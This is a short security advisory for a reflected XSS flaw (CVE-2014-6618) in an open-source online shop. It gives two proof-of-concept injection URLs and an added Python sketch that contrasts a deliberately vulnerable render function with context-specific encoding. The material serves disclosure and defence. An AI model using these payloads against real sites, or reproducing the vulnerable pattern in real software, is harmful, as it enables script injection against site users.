Title: Your online shop GET Reflected XSS
Severity: High
CVE-ID: CVE-2014-6618
Release Date: 20 September 2014
Author: Kenneth F. Belva
Websites: http://silverbackventuresllc.com
          http://xssWarrior.com
          http://securitymaverick.com
Twitter: @infosecmaverick
Contact: Please use website contact form.
Mail:
URL: http://sourceforge.net/projects/youronlineshop/
Vendor:
Remote Exploit: Yes
Discovered with: xssWarrior - http://xssWarrior.com

Description:
============
XSS in both the script and HTML tags for the products_id field.

Proof of Concept :
==================
Script Tags
http://[domain]/youronlineshop/youronlineshop/?seccion=ver_prod&products_id=test%22%29;+alert%2810%29;+//

HTML Attribute
http://[domain]/youronlineshop/youronlineshop/?seccion=ver_prod&products_id=test%22/%3E%3Cscript%3Ealert%2811%29%3C/script%3E%3C
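
Mitigation sketch (added example, not part of the original advisory and not the project's code): the two reflection contexts named above each need their own output encoder. The sink shapes and the loadProduct() name are assumptions made for illustration; the inputs are the query strings of the two proof-of-concept URLs above.

```python
import html
import json
from urllib.parse import parse_qs

# Query strings of the two proof-of-concept URLs in the advisory (host omitted).
POC_SCRIPT = "seccion=ver_prod&products_id=test%22%29;+alert%2810%29;+//"
POC_ATTR = ("seccion=ver_prod&products_id="
            "test%22/%3E%3Cscript%3Ealert%2811%29%3C/script%3E%3C")


def products_id(query):
    """Return the URL-decoded products_id parameter."""
    return parse_qs(query, keep_blank_values=True).get("products_id", [""])[0]


def attr_encode(value):
    """Encode for a double-quoted HTML attribute value."""
    return html.escape(value, quote=True)


def js_string_encode(value):
    """Return a quoted JS string literal that is safe inside inline <script>."""
    literal = json.dumps(value)  # escapes ", \, control chars and non-ASCII
    for ch in "<>&":             # keep "</script>" and entities out of the literal
        literal = literal.replace(ch, "\\u%04x" % ord(ch))
    return literal


# ASSUMED sink shapes; loadProduct() is a hypothetical name.
def render_vulnerable(pid):
    """Reflect the raw value into both contexts (the behaviour reported)."""
    return ('<script>loadProduct("%s");</script>\n'
            '<input type="hidden" name="products_id" value="%s"/>' % (pid, pid))


def render_encoded(pid):
    """Same page fragment with one encoder per output context."""
    return ('<script>loadProduct(%s);</script>\n'
            '<input type="hidden" name="products_id" value="%s"/>'
            % (js_string_encode(pid), attr_encode(pid)))


if __name__ == "__main__":
    for poc in (POC_SCRIPT, POC_ATTR):
        pid = products_id(poc)
        print(render_vulnerable(pid), render_encoded(pid), sep="\n", end="\n\n")
```

HTML entity encoding alone does not cover the script context, and JS string escaping alone does not cover the attribute context, which is why the fragment uses both.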